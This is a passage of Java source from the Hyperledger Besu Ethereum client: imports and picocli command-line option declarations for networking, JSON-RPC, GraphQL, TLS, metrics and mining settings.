org.hyperledger.besu.cli.custom.RpcAuthFileValidator; import org.hyperledger.besu.cli.error.BesuExceptionHandler; import org.hyperledger.besu.cli.options.unstable.DataStorageOptions; import org.hyperledger.besu.cli.options.unstable.DnsOptions; import org.hyperledger.besu.cli.options.unstable.EthProtocolOptions; import org.hyperledger.besu.cli.options.unstable.EthstatsOptions; import org.hyperledger.besu.cli.options.unstable.LauncherOptions; import org.hyperledger.besu.cli.options.unstable.MetricsCLIOptions; import org.hyperledger.besu.cli.options.unstable.MiningOptions; import org.hyperledger.besu.cli.options.unstable.NatOptions; import 
org.hyperledger.besu.cli.options.unstable.NativeLibraryOptions; import org.hyperledger.besu.cli.options.unstable.NetworkingOptions; import org.hyperledger.besu.cli.options.unstable.RPCOptions; import org.hyperledger.besu.cli.options.unstable.SynchronizerOptions; import org.hyperledger.besu.cli.options.unstable.TransactionPoolOptions; import org.hyperledger.besu.cli.presynctasks.PreSynchronizationTaskRunner; import org.hyperledger.besu.cli.presynctasks.PrivateDatabaseMigrationPreSyncTask; import org.hyperledger.besu.cli.subcommands.PasswordSubCommand; import org.hyperledger.besu.cli.subcommands.PublicKeySubCommand; import org.hyperledger.besu.cli.subcommands.RetestethSubCommand; import org.hyperledger.besu.cli.subcommands.blocks.BlocksSubCommand; import org.hyperledger.besu.cli.subcommands.operator.OperatorSubCommand; import org.hyperledger.besu.cli.subcommands.rlp.RLPSubCommand; import org.hyperledger.besu.cli.util.BesuCommandCustomFactory; import org.hyperledger.besu.cli.util.CommandLineUtils; import org.hyperledger.besu.cli.util.ConfigOptionSearchAndRunHandler; import org.hyperledger.besu.cli.util.VersionProvider; import org.hyperledger.besu.config.GenesisConfigFile; import org.hyperledger.besu.config.GenesisConfigOptions; import org.hyperledger.besu.config.GoQuorumOptions; import org.hyperledger.besu.config.experimental.ExperimentalEIPs; import org.hyperledger.besu.controller.BesuController; import org.hyperledger.besu.controller.BesuControllerBuilder; import org.hyperledger.besu.controller.TargetingGasLimitCalculator; import org.hyperledger.besu.crypto.KeyPair; import org.hyperledger.besu.crypto.KeyPairSecurityModule; import org.hyperledger.besu.crypto.KeyPairUtil; import org.hyperledger.besu.crypto.NodeKey; import org.hyperledger.besu.crypto.SignatureAlgorithmFactory; import org.hyperledger.besu.crypto.SignatureAlgorithmType; import org.hyperledger.besu.enclave.EnclaveFactory; import org.hyperledger.besu.enclave.GoQuorumEnclave; import org.hyperledger.besu.ethereum.api.ApiConfiguration; import org.hyperledger.besu.ethereum.api.ImmutableApiConfiguration; import org.hyperledger.besu.ethereum.api.graphql.GraphQLConfiguration; import org.hyperledger.besu.ethereum.api.jsonrpc.JsonRpcConfiguration; import org.hyperledger.besu.ethereum.api.jsonrpc.RpcApi; import org.hyperledger.besu.ethereum.api.jsonrpc.RpcApis; import org.hyperledger.besu.ethereum.api.jsonrpc.websocket.WebSocketConfiguration; import org.hyperledger.besu.ethereum.api.tls.FileBasedPasswordProvider; import org.hyperledger.besu.ethereum.api.tls.TlsClientAuthConfiguration; import org.hyperledger.besu.ethereum.api.tls.TlsConfiguration; import org.hyperledger.besu.ethereum.blockcreation.GasLimitCalculator; import org.hyperledger.besu.ethereum.chain.Blockchain; import org.hyperledger.besu.ethereum.core.Address; import org.hyperledger.besu.ethereum.core.GoQuorumPrivacyParameters; import org.hyperledger.besu.ethereum.core.Hash; import org.hyperledger.besu.ethereum.core.MiningParameters; import org.hyperledger.besu.ethereum.core.PrivacyParameters; import org.hyperledger.besu.ethereum.core.Wei; import org.hyperledger.besu.ethereum.eth.sync.SyncMode; import org.hyperledger.besu.ethereum.eth.sync.SynchronizerConfiguration; import org.hyperledger.besu.ethereum.eth.transactions.TransactionPoolConfiguration; import org.hyperledger.besu.ethereum.mainnet.precompiles.AbstractAltBnPrecompiledContract; import org.hyperledger.besu.ethereum.p2p.config.DiscoveryConfiguration; import org.hyperledger.besu.ethereum.p2p.peers.EnodeDnsConfiguration; 
import org.hyperledger.besu.ethereum.p2p.peers.EnodeURL; import org.hyperledger.besu.ethereum.p2p.peers.StaticNodesParser; import org.hyperledger.besu.ethereum.permissioning.GoQuorumPermissioningConfiguration; import org.hyperledger.besu.ethereum.permissioning.LocalPermissioningConfiguration; import org.hyperledger.besu.ethereum.permissioning.PermissioningConfiguration; import org.hyperledger.besu.ethereum.permissioning.PermissioningConfigurationBuilder; import org.hyperledger.besu.ethereum.permissioning.SmartContractPermissioningConfiguration; import org.hyperledger.besu.ethereum.privacy.storage.keyvalue.PrivacyKeyValueStorageProvider; import org.hyperledger.besu.ethereum.privacy.storage.keyvalue.PrivacyKeyValueStorageProviderBuilder; import org.hyperledger.besu.ethereum.storage.StorageProvider; import org.hyperledger.besu.ethereum.storage.keyvalue.KeyValueStorageProvider; import org.hyperledger.besu.ethereum.storage.keyvalue.KeyValueStorageProviderBuilder; import org.hyperledger.besu.ethereum.worldstate.DefaultWorldStateArchive; import org.hyperledger.besu.ethereum.worldstate.PrunerConfiguration; import org.hyperledger.besu.ethereum.worldstate.WorldStateArchive; import org.hyperledger.besu.ethereum.worldstate.WorldStatePreimageStorage; import org.hyperledger.besu.ethereum.worldstate.WorldStateStorage; import org.hyperledger.besu.metrics.BesuMetricCategory; import org.hyperledger.besu.metrics.MetricCategoryRegistryImpl; import org.hyperledger.besu.metrics.MetricsProtocol; import org.hyperledger.besu.metrics.MetricsSystemFactory; import org.hyperledger.besu.metrics.ObservableMetricsSystem; import org.hyperledger.besu.metrics.StandardMetricCategory; import org.hyperledger.besu.metrics.prometheus.MetricsConfiguration; import org.hyperledger.besu.metrics.vertx.VertxMetricsAdapterFactory; import org.hyperledger.besu.nat.NatMethod; import org.hyperledger.besu.plugin.services.BesuConfiguration; import org.hyperledger.besu.plugin.services.BesuEvents; import org.hyperledger.besu.plugin.services.MetricsSystem; import org.hyperledger.besu.plugin.services.PicoCLIOptions; import org.hyperledger.besu.plugin.services.SecurityModuleService; import org.hyperledger.besu.plugin.services.StorageService; import org.hyperledger.besu.plugin.services.exception.StorageException; import org.hyperledger.besu.plugin.services.metrics.MetricCategory; import org.hyperledger.besu.plugin.services.metrics.MetricCategoryRegistry; import org.hyperledger.besu.plugin.services.securitymodule.SecurityModule; import org.hyperledger.besu.plugin.services.storage.PrivacyKeyValueStorageFactory; import org.hyperledger.besu.plugin.services.storage.rocksdb.RocksDBPlugin; import org.hyperledger.besu.services.BesuEventsImpl; import org.hyperledger.besu.services.BesuPluginContextImpl; import org.hyperledger.besu.services.PicoCLIOptionsImpl; import org.hyperledger.besu.services.SecurityModuleServiceImpl; import org.hyperledger.besu.services.StorageServiceImpl; import org.hyperledger.besu.services.kvstore.InMemoryStoragePlugin; import org.hyperledger.besu.util.NetworkUtility; import org.hyperledger.besu.util.PermissioningConfigurationValidator; import org.hyperledger.besu.util.number.Fraction; import org.hyperledger.besu.util.number.Percentage; import org.hyperledger.besu.util.number.PositiveNumber; import java.io.File; import java.io.IOException; import java.io.InputStream; import java.math.BigInteger; import java.net.InetAddress; import java.net.SocketException; import java.net.URI; import java.net.UnknownHostException; import 
java.nio.file.Path; import java.time.Clock; import java.util.ArrayList; import java.util.Base64; import java.util.Collection; import java.util.HashMap; import java.util.HashSet; import java.util.List; import java.util.Map; import java.util.Objects; import java.util.Optional; import java.util.OptionalLong; import java.util.Set; import java.util.TreeMap; import java.util.function.Function; import java.util.function.Supplier; import java.util.stream.Collectors; import com.google.common.annotations.VisibleForTesting; import com.google.common.base.Strings; import com.google.common.base.Suppliers; import com.google.common.collect.ImmutableMap; import com.google.common.io.Files; import com.google.common.io.Resources; import io.vertx.core.Vertx; import io.vertx.core.VertxOptions; import io.vertx.core.json.DecodeException; import io.vertx.core.metrics.MetricsOptions; import net.consensys.quorum.mainnet.launcher.LauncherManager; import net.consensys.quorum.mainnet.launcher.config.ImmutableLauncherConfig; import net.consensys.quorum.mainnet.launcher.exception.LauncherException; import net.consensys.quorum.mainnet.launcher.util.ParseArgsHelper; import org.apache.logging.log4j.Level; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import org.apache.logging.log4j.core.config.Configurator; import org.apache.tuweni.bytes.Bytes; import org.apache.tuweni.units.bigints.UInt256; import picocli.CommandLine; import picocli.CommandLine.AbstractParseResultHandler; import picocli.CommandLine.Command; import picocli.CommandLine.ExecutionException; import picocli.CommandLine.Option; import picocli.CommandLine.ParameterException; @SuppressWarnings("FieldCanBeLocal") // because Picocli injected fields report false positives @Command( description = "This command runs the Besu Ethereum client full node.", abbreviateSynopsis = true, name = "besu", mixinStandardHelpOptions = true, versionProvider = VersionProvider.class, header = "Usage:", synopsisHeading = "%n", descriptionHeading = "%nDescription:%n%n", optionListHeading = "%nOptions:%n", footerHeading = "%n", footer = "Besu is licensed under the Apache License 2.0") public class BesuCommand implements DefaultCommandValues, Runnable { @SuppressWarnings("PrivateStaticFinalLoggers") // non-static for testing private final Logger logger; private CommandLine commandLine; private final Supplier<RlpBlockImporter> rlpBlockImporter; private final Function<BesuController, JsonBlockImporter> jsonBlockImporterFactory; private final Function<Blockchain, RlpBlockExporter> rlpBlockExporterFactory; // Unstable CLI options final NetworkingOptions unstableNetworkingOptions = NetworkingOptions.create(); final SynchronizerOptions unstableSynchronizerOptions = SynchronizerOptions.create(); final EthProtocolOptions unstableEthProtocolOptions = EthProtocolOptions.create(); final MetricsCLIOptions unstableMetricsCLIOptions = MetricsCLIOptions.create(); final TransactionPoolOptions unstableTransactionPoolOptions = TransactionPoolOptions.create(); private final EthstatsOptions unstableEthstatsOptions = EthstatsOptions.create(); private final DataStorageOptions unstableDataStorageOptions = DataStorageOptions.create(); private final DnsOptions unstableDnsOptions = DnsOptions.create(); private final MiningOptions unstableMiningOptions = MiningOptions.create(); private final NatOptions unstableNatOptions = NatOptions.create(); private final NativeLibraryOptions unstableNativeLibraryOptions = NativeLibraryOptions.create(); private final RPCOptions 
unstableRPCOptions = RPCOptions.create(); final LauncherOptions unstableLauncherOptions = LauncherOptions.create(); private final RunnerBuilder runnerBuilder; private final BesuController.Builder controllerBuilderFactory; private final BesuPluginContextImpl besuPluginContext; private final StorageServiceImpl storageService; private final SecurityModuleServiceImpl securityModuleService; private final Map<String, String> environment; private final MetricCategoryRegistryImpl metricCategoryRegistry = new MetricCategoryRegistryImpl(); private final MetricCategoryConverter metricCategoryConverter = new MetricCategoryConverter(); // Public IP stored to prevent having to research it each time we need it. private InetAddress autoDiscoveredDefaultIP = null; private final PreSynchronizationTaskRunner preSynchronizationTaskRunner = new PreSynchronizationTaskRunner(); private final Set<Integer> allocatedPorts = new HashSet<>(); // CLI options defined by user at runtime. // Options parsing is done with CLI library Picocli https://picocli.info/ // While this variable is never read it is needed for the PicoCLI to create // the config file option that is read elsewhere. @SuppressWarnings("UnusedVariable") @CommandLine.Option( names = {CONFIG_FILE_OPTION_NAME}, paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "TOML config file (default: none)") private final File configFile = null; @CommandLine.Option( names = {"--data-path"}, paramLabel = MANDATORY_PATH_FORMAT_HELP, description = "The path to Besu data directory (default: ${DEFAULT-VALUE})") final Path dataPath = getDefaultBesuDataPath(this); // Genesis file path with null default option if the option // is not defined on command line as this default is handled by Runner // to use mainnet json file from resources as indicated in the // default network option // Then we have no control over genesis default value here. @CommandLine.Option( names = {"--genesis-file"}, paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "Genesis file. Setting this option makes --network option ignored and requires --network-id to be set.") private final File genesisFile = null; @CommandLine.Option( names = {"--node-private-key-file"}, paramLabel = MANDATORY_PATH_FORMAT_HELP, description = "The node's private key file (default: a file named \"key\" in the Besu data folder)") private final File nodePrivateKeyFile = null; @Option( names = "--identity", paramLabel = "<String>", description = "Identification for this node in the Client ID", arity = "1") private final Optional<String> identityString = Optional.empty(); // Completely disables P2P within Besu. @Option( names = {"--p2p-enabled"}, description = "Enable P2P functionality (default: ${DEFAULT-VALUE})", arity = "1") private final Boolean p2pEnabled = true; // Boolean option to indicate if peers should NOT be discovered, default to // false indicates that // the peers should be discovered by default. // // This negative option is required because of the nature of the option that is // true when // added on the command line. You can't do --option=false, so false is set as // default // and you have not to set the option at all if you want it false. // This seems to be the only way it works with Picocli. // Also many other software use the same negative option scheme for false // defaults // meaning that it's probably the right way to handle disabling options. 
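  // Illustrative invocation (not taken from this file): discovery can be switched
  // off while still dialing an explicitly supplied bootnode, e.g.
  //   besu --discovery-enabled=false --bootnodes=enode://<node-id>@127.0.0.1:30303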
@Option( names = {"--discovery-enabled"}, description = "Enable P2P discovery (default: ${DEFAULT-VALUE})", arity = "1") private final Boolean peerDiscoveryEnabled = true; // A list of bootstrap nodes can be passed // and a hardcoded list will be used otherwise by the Runner. // NOTE: we have no control over default value here. @Option( names = {"--bootnodes"}, paramLabel = "<enode://id@host:port>", description = "Comma separated enode URLs for P2P discovery bootstrap. " + "Default is a predefined list.", split = ",", arity = "0..*") private final List<String> bootNodes = null; @Option( names = {"--max-peers"}, paramLabel = MANDATORY_INTEGER_FORMAT_HELP, description = "Maximum P2P connections that can be established (default: ${DEFAULT-VALUE})") private final Integer maxPeers = DEFAULT_MAX_PEERS; @Option( names = {"--remote-connections-limit-enabled"}, description = "Whether to limit the number of P2P connections initiated remotely. (default: ${DEFAULT-VALUE})") private final Boolean isLimitRemoteWireConnectionsEnabled = true; @Option( names = {"--remote-connections-max-percentage"}, paramLabel = MANDATORY_DOUBLE_FORMAT_HELP, description = "The maximum percentage of P2P connections that can be initiated remotely. Must be between 0 and 100 inclusive. (default: ${DEFAULT-VALUE})", arity = "1", converter = PercentageConverter.class) private final Integer maxRemoteConnectionsPercentage = Fraction.fromFloat(DEFAULT_FRACTION_REMOTE_WIRE_CONNECTIONS_ALLOWED) .toPercentage() .getValue(); @Option( names = {"--random-peer-priority-enabled"}, description = "Allow for incoming connections to be prioritized randomly. This will prevent (typically small, stable) networks from forming impenetrable peer cliques. (default: ${DEFAULT-VALUE})") private final Boolean randomPeerPriority = false; @Option( names = {"--banned-node-ids", "--banned-node-id"}, paramLabel = MANDATORY_NODE_ID_FORMAT_HELP, description = "A list of node IDs to ban from the P2P network.", split = ",", arity = "1..*") void setBannedNodeIds(final List<String> values) { try { bannedNodeIds = values.stream() .filter(value -> !value.isEmpty()) .map(EnodeURL::parseNodeId) .collect(Collectors.toList()); } catch (final IllegalArgumentException e) { throw new ParameterException( commandLine, "Invalid ids supplied to '--banned-node-ids'. " + e.getMessage()); } } private Collection<Bytes> bannedNodeIds = new ArrayList<>(); @Option( names = {"--sync-mode"}, paramLabel = MANDATORY_MODE_FORMAT_HELP, description = "Synchronization mode, possible values are ${COMPLETION-CANDIDATES} (default: FAST if a --network is supplied and privacy isn't enabled. FULL otherwise.)") private SyncMode syncMode = null; @Option( names = {"--fast-sync-min-peers"}, paramLabel = MANDATORY_INTEGER_FORMAT_HELP, description = "Minimum number of peers required before starting fast sync. (default: ${DEFAULT-VALUE})") private final Integer fastSyncMinPeerCount = FAST_SYNC_MIN_PEER_COUNT; @Option( names = {"--network"}, paramLabel = MANDATORY_NETWORK_FORMAT_HELP, description = "Synchronize against the indicated network, possible values are ${COMPLETION-CANDIDATES}." + " (default: MAINNET)") private final NetworkName network = null; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. 
@Option( names = {"--p2p-host"}, paramLabel = MANDATORY_HOST_FORMAT_HELP, description = "Ip address this node advertises to its peers (default: ${DEFAULT-VALUE})", arity = "1") private String p2pHost = autoDiscoverDefaultIP().getHostAddress(); @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @Option( names = {"--p2p-interface"}, paramLabel = MANDATORY_HOST_FORMAT_HELP, description = "The network interface address on which this node listens for P2P communication (default: ${DEFAULT-VALUE})", arity = "1") private String p2pInterface = NetworkUtility.INADDR_ANY; @Option( names = {"--p2p-port"}, paramLabel = MANDATORY_PORT_FORMAT_HELP, description = "Port on which to listen for P2P communication (default: ${DEFAULT-VALUE})", arity = "1") private final Integer p2pPort = EnodeURL.DEFAULT_LISTENING_PORT; @Option( names = {"--nat-method"}, description = "Specify the NAT circumvention method to be used, possible values are ${COMPLETION-CANDIDATES}." + " NONE disables NAT functionality. (default: ${DEFAULT-VALUE})") private final NatMethod natMethod = DEFAULT_NAT_METHOD; @Option( names = {"--network-id"}, paramLabel = "<BIG INTEGER>", description = "P2P network identifier. (default: the selected network chain ID or custom genesis chain ID)", arity = "1") private final BigInteger networkId = null; @Option( names = {"--graphql-http-enabled"}, description = "Set to start the GraphQL HTTP service (default: ${DEFAULT-VALUE})") private final Boolean isGraphQLHttpEnabled = false; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @Option( names = {"--graphql-http-host"}, paramLabel = MANDATORY_HOST_FORMAT_HELP, description = "Host for GraphQL HTTP to listen on (default: ${DEFAULT-VALUE})", arity = "1") private String graphQLHttpHost = autoDiscoverDefaultIP().getHostAddress(); @Option( names = {"--graphql-http-port"}, paramLabel = MANDATORY_PORT_FORMAT_HELP, description = "Port for GraphQL HTTP to listen on (default: ${DEFAULT-VALUE})", arity = "1") private final Integer graphQLHttpPort = DEFAULT_GRAPHQL_HTTP_PORT; @Option( names = {"--graphql-http-cors-origins"}, description = "Comma separated origin domain URLs for CORS validation (default: none)") private final CorsAllowedOriginsProperty graphQLHttpCorsAllowedOrigins = new CorsAllowedOriginsProperty(); @Option( names = {"--rpc-http-enabled"}, description = "Set to start the JSON-RPC HTTP service (default: ${DEFAULT-VALUE})") private final Boolean isRpcHttpEnabled = false; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @Option( names = {"--rpc-http-host"}, paramLabel = MANDATORY_HOST_FORMAT_HELP, description = "Host for JSON-RPC HTTP to listen on (default: ${DEFAULT-VALUE})", arity = "1") private String rpcHttpHost = autoDiscoverDefaultIP().getHostAddress(); @Option( names = {"--rpc-http-port"}, paramLabel = MANDATORY_PORT_FORMAT_HELP, description = "Port for JSON-RPC HTTP to listen on (default: ${DEFAULT-VALUE})", arity = "1") private final Integer rpcHttpPort = DEFAULT_JSON_RPC_PORT; @Option( names = {"--rpc-http-max-active-connections"}, description = "Maximum number of HTTP connections allowed for JSON-RPC (default: ${DEFAULT-VALUE}). 
Once this limit is reached, incoming connections will be rejected.", arity = "1") private final Integer rpcHttpMaxConnections = DEFAULT_HTTP_MAX_CONNECTIONS; // A list of origins URLs that are accepted by the JsonRpcHttpServer (CORS) @Option( names = {"--rpc-http-cors-origins"}, description = "Comma separated origin domain URLs for CORS validation (default: none)") private final CorsAllowedOriginsProperty rpcHttpCorsAllowedOrigins = new CorsAllowedOriginsProperty(); @Option( names = {"--rpc-http-api", "--rpc-http-apis"}, paramLabel = "<api name>", split = ",", arity = "1..*", converter = RpcApisConverter.class, description = "Comma separated list of APIs to enable on JSON-RPC HTTP service (default: ${DEFAULT-VALUE})") private final Collection<RpcApi> rpcHttpApis = DEFAULT_JSON_RPC_APIS; @Option( names = {"--rpc-http-authentication-enabled"}, description = "Require authentication for the JSON-RPC HTTP service (default: ${DEFAULT-VALUE})") private final Boolean isRpcHttpAuthenticationEnabled = false; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @CommandLine.Option( names = {"--rpc-http-authentication-credentials-file"}, paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "Storage file for JSON-RPC HTTP authentication credentials (default: ${DEFAULT-VALUE})", arity = "1") private String rpcHttpAuthenticationCredentialsFile = null; @CommandLine.Option( names = {"--rpc-http-authentication-jwt-public-key-file"}, paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "JWT public key file for JSON-RPC HTTP authentication", arity = "1") private final File rpcHttpAuthenticationPublicKeyFile = null; @Option( names = {"--rpc-http-tls-enabled"}, description = "Enable TLS for the JSON-RPC HTTP service (default: ${DEFAULT-VALUE})") private final Boolean isRpcHttpTlsEnabled = false; @Option( names = {"--rpc-http-tls-keystore-file"}, paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "Keystore (PKCS#12) containing key/certificate for the JSON-RPC HTTP service. Required if TLS is enabled.") private final Path rpcHttpTlsKeyStoreFile = null; @Option( names = {"--rpc-http-tls-keystore-password-file"}, paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "File containing password to unlock keystore for the JSON-RPC HTTP service. Required if TLS is enabled.") private final Path rpcHttpTlsKeyStorePasswordFile = null; @Option( names = {"--rpc-http-tls-client-auth-enabled"}, description = "Enable TLS client authentication for the JSON-RPC HTTP service (default: ${DEFAULT-VALUE})") private final Boolean isRpcHttpTlsClientAuthEnabled = false; @Option( names = {"--rpc-http-tls-known-clients-file"}, paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "Path to file containing clients certificate common name and fingerprint for client authentication") private final Path rpcHttpTlsKnownClientsFile = null; @Option( names = {"--rpc-http-tls-ca-clients-enabled"}, description = "Enable to accept clients certificate signed by a valid CA for client authentication (default: ${DEFAULT-VALUE})") private final Boolean isRpcHttpTlsCAClientsEnabled = false; @Option( names = {"--rpc-ws-enabled"}, description = "Set to start the JSON-RPC WebSocket service (default: ${DEFAULT-VALUE})") private final Boolean isRpcWsEnabled = false; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. 
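  // The WebSocket JSON-RPC options below mirror the HTTP ones above; a minimal
  // illustrative invocation: besu --rpc-ws-enabled --rpc-ws-host=0.0.0.0 --rpc-ws-port=8546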
@Option( names = {"--rpc-ws-host"}, paramLabel = MANDATORY_HOST_FORMAT_HELP, description = "Host for JSON-RPC WebSocket service to listen on (default: ${DEFAULT-VALUE})", arity = "1") private String rpcWsHost = autoDiscoverDefaultIP().getHostAddress(); @Option( names = {"--rpc-ws-port"}, paramLabel = MANDATORY_PORT_FORMAT_HELP, description = "Port for JSON-RPC WebSocket service to listen on (default: ${DEFAULT-VALUE})", arity = "1") private final Integer rpcWsPort = DEFAULT_WEBSOCKET_PORT; @Option( names = {"--rpc-ws-max-active-connections"}, description = "Maximum number of WebSocket connections allowed for JSON-RPC (default: ${DEFAULT-VALUE}). Once this limit is reached, incoming connections will be rejected.", arity = "1") private final Integer rpcWsMaxConnections = DEFAULT_WS_MAX_CONNECTIONS; @Option( names = {"--rpc-ws-api", "--rpc-ws-apis"}, paramLabel = "<api name>", split = ",", arity = "1..*", converter = RpcApisConverter.class, description = "Comma separated list of APIs to enable on JSON-RPC WebSocket service (default: ${DEFAULT-VALUE})") private final List<RpcApi> rpcWsApis = DEFAULT_JSON_RPC_APIS; @Option( names = {"--rpc-ws-authentication-enabled"}, description = "Require authentication for the JSON-RPC WebSocket service (default: ${DEFAULT-VALUE})") private final Boolean isRpcWsAuthenticationEnabled = false; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @CommandLine.Option( names = {"--rpc-ws-authentication-credentials-file"}, paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "Storage file for JSON-RPC WebSocket authentication credentials (default: ${DEFAULT-VALUE})", arity = "1") private String rpcWsAuthenticationCredentialsFile = null; @CommandLine.Option( names = {"--rpc-ws-authentication-jwt-public-key-file"}, paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "JWT public key file for JSON-RPC WebSocket authentication", arity = "1") private final File rpcWsAuthenticationPublicKeyFile = null; @Option( names = {"--privacy-tls-enabled"}, paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "Enable TLS for connecting to privacy enclave (default: ${DEFAULT-VALUE})") private final Boolean isPrivacyTlsEnabled = false; @Option( names = "--privacy-tls-keystore-file", paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "Path to a PKCS#12 formatted keystore; used to enable TLS on inbound connections.") private final Path privacyKeyStoreFile = null; @Option( names = "--privacy-tls-keystore-password-file", paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "Path to a file containing the password used to decrypt the keystore.") private final Path privacyKeyStorePasswordFile = null; @Option( names = "--privacy-tls-known-enclave-file", paramLabel = MANDATORY_FILE_FORMAT_HELP, description = "Path to a file containing the fingerprints of the authorized privacy enclave.") private final Path privacyTlsKnownEnclaveFile = null; @Option( names = {"--metrics-enabled"}, description = "Set to start the metrics exporter (default: ${DEFAULT-VALUE})") private final Boolean isMetricsEnabled = false; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @Option( names = {"--metrics-protocol"}, description = "Metrics protocol, one of PROMETHEUS, OPENTELEMETRY or NONE. (default: ${DEFAULT-VALUE})") private MetricsProtocol metricsProtocol = PROMETHEUS; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. 
@Option( names = {"--metrics-host"}, paramLabel = MANDATORY_HOST_FORMAT_HELP, description = "Host for the metrics exporter to listen on (default: ${DEFAULT-VALUE})", arity = "1") private String metricsHost = autoDiscoverDefaultIP().getHostAddress(); @Option( names = {"--metrics-port"}, paramLabel = MANDATORY_PORT_FORMAT_HELP, description = "Port for the metrics exporter to listen on (default: ${DEFAULT-VALUE})", arity = "1") private final Integer metricsPort = DEFAULT_METRICS_PORT; @Option( names = {"--metrics-category", "--metrics-categories"}, paramLabel = "<category name>", split = ",", arity = "1..*", description = "Comma separated list of categories to track metrics for (default: ${DEFAULT-VALUE})") private final Set<MetricCategory> metricCategories = DEFAULT_METRIC_CATEGORIES; @Option( names = {"--metrics-push-enabled"}, description = "Enable the metrics push gateway integration (default: ${DEFAULT-VALUE})") private final Boolean isMetricsPushEnabled = false; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @Option( names = {"--metrics-push-host"}, paramLabel = MANDATORY_HOST_FORMAT_HELP, description = "Host of the Prometheus Push Gateway for push mode (default: ${DEFAULT-VALUE})", arity = "1") private String metricsPushHost = autoDiscoverDefaultIP().getHostAddress(); @Option( names = {"--metrics-push-port"}, paramLabel = MANDATORY_PORT_FORMAT_HELP, description = "Port of the Prometheus Push Gateway for push mode (default: ${DEFAULT-VALUE})", arity = "1") private final Integer metricsPushPort = DEFAULT_METRICS_PUSH_PORT; @Option( names = {"--metrics-push-interval"}, paramLabel = MANDATORY_INTEGER_FORMAT_HELP, description = "Interval in seconds to push metrics when in push mode (default: ${DEFAULT-VALUE})", arity = "1") private final Integer metricsPushInterval = 15; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @Option( names = {"--metrics-push-prometheus-job"}, description = "Job name to use when in push mode (default: ${DEFAULT-VALUE})", arity = "1") private String metricsPrometheusJob = "besu-client"; @Option( names = {"--host-allowlist"}, paramLabel = "<hostname>[,<hostname>...]... or * or all", description = "Comma separated list of hostnames to allow for RPC access, or * to accept any host (default: ${DEFAULT-VALUE})", defaultValue = "localhost,127.0.0.1") private final JsonRPCAllowlistHostsProperty hostsAllowlist = new JsonRPCAllowlistHostsProperty(); @Option( names = {"--host-whitelist"}, hidden = true, paramLabel = "<hostname>[,<hostname>...]... or * or all", description = "Deprecated in favor of --host-allowlist. 
Comma separated list of hostnames to allow for RPC access, or * to accept any host (default: ${DEFAULT-VALUE})") private final JsonRPCAllowlistHostsProperty hostsWhitelist = new JsonRPCAllowlistHostsProperty(); @Option( names = {"--logging", "-l"}, paramLabel = "<LOG VERBOSITY LEVEL>", description = "Logging verbosity levels: OFF, FATAL, ERROR, WARN, INFO, DEBUG, TRACE, ALL") private final Level logLevel = null; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) @Option( names = {"--color-enabled"}, description = "Force color output to be enabled/disabled (default: colorized only if printing to console)") private static Boolean colorEnabled = null; @Option( names = {"--reorg-logging-threshold"}, description = "How deep a chain reorganization must be in order for it to be logged (default: ${DEFAULT-VALUE})") private final Long reorgLoggingThreshold = 6L; @Option( names = {"--miner-enabled"}, description = "Set if node will perform mining (default: ${DEFAULT-VALUE})") private final Boolean isMiningEnabled = false; @Option( names = {"--miner-stratum-enabled"}, description = "Set if node will perform Stratum mining (default: ${DEFAULT-VALUE})") private final Boolean iStratumMiningEnabled = false; @SuppressWarnings({"FieldCanBeFinal", "FieldMayBeFinal"}) // PicoCLI requires non-final Strings. @Option( names = {"--miner-stratum-host"}, description = "Host for Stratum network mining service (default: ${DEFAULT-VALUE})") private String stratumNetworkInterface = "0.0.0.0"; @Option( names = {"--miner-stratum-port"}, description = "Stratum port binding (default: ${DEFAULT-VALUE})") private final Integer stratumPort = 8008; @Option( names = {"--miner-coinbase"}, description = "Account to which mining rewards are paid. You must specify a valid coinbase if " + "mining is enabled using --miner-enabled option", arity = "1") private final Address coinbase = null; @Option( names = {"--min-gas-price"}, description = "Minimum price (in Wei) offered by a transaction for it to be included in a mined " + "block (default: ${DEFAULT-VALUE})", arity = "1") private final Wei minTransactionGasPrice = DEFAULT_MIN_TRANSACTION_GAS_PRICE; @Option( names = {"--rpc-tx-feecap"}, description = "Maximum transaction fees (in Wei) accepted for transaction submitted through RPC (default: ${DEFAULT-VALUE})", arity = "1") private final Wei txFeeCap = DEFAULT_RPC_TX_FEE_CAP; @Option( names = {"--min-block-occupancy-ratio"}, description = "Minimum occupancy ratio for a mined block (default: ${DEFAULT-VALUE})", arity = "1") private final Double minBlockOccupancyRatio = DEFAULT_MIN_BLOCK_OCCUPANCY_RATIO; @Option( names = {"--miner-extra-data"}, description = "A hex string representing the (32) bytes to be included in the extra data " + "field of a mined block (default: ${DEFAULT-VALUE})", arity = "1") private final Bytes extraData = DEFAULT_EXTRA_DATA; @Option( names = {"--pruning-enabled"}, description = "Enable disk-space saving optimization that removes old state that is 